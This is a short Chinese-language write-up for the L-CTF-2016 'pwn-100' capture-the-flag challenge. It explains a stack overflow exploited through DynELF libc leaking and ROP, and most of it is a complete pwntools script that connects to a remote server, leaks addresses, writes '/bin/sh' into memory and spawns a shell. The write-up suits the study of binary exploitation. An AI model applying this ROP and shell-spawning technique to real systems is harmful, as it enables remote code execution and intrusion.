pwn-100

题目来源： L-CTF-2016

题目描述：暂无

 

 

题目存在栈溢出，未给libc，但是有puts，因此可以考虑DynELF获取system地址之后，用read读入"/bin/sh"之后获取shell

注意点是，每次要回到main函数，这样能调整栈帧，否则可能会出现诸如environ被更改导致无法成功shell的问题

exp如下：

from pwn import *

puts_addr = 0x400500
read_addr = 0x400520
main_addr = 0x4006B8
goal_addr = 0x601100
pop_rdi = 0x400763
pop_rsi_r15 = 0x400761

def leak(address):
    payload = b'a' * 72 + p64(pop_rdi) + p64(address) + p64(puts_addr)
    payload += p64(main_addr)
    payload = payload.ljust(200, b'\x90')
    io.send(payload)
    io.recvuntil('bye~\n')
    data = b''
    last = b''
    while True:
        now = io.recv(1, timeout = 0.2)
        if last == b'\n' and now == b'':
            data = data[:-1]
            data += b'\x00'
            break
        else:
            data += now
        last = now
    return data

#io = process('./pwn')
io = remote('111.200.241.244', 53187)
d = DynELF(leak, elf = ELF('./pwn'))
system_addr = d.lookup('system', 'libc')
info("system:" + str(hex(system_addr)))

payload = b'a' * 72 + p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(goal_addr)
payload += p64(0) + p64(read_addr) + p64(main_addr)
payload = payload.ljust(200, b'\x90')
io.send(payload)
io.recvuntil('bye~\n')
io.send(b'/bin/sh\x00')
payload = b'a' * 72 + p64(pop_rdi) + p64(goal_addr)
payload += p64(pop_rsi_r15) + p64(0) + p64(0) + p64(system_addr)
payload = payload.ljust(200, b'\x90')
sleep(0.5)

io.send(payload)

io.interactive()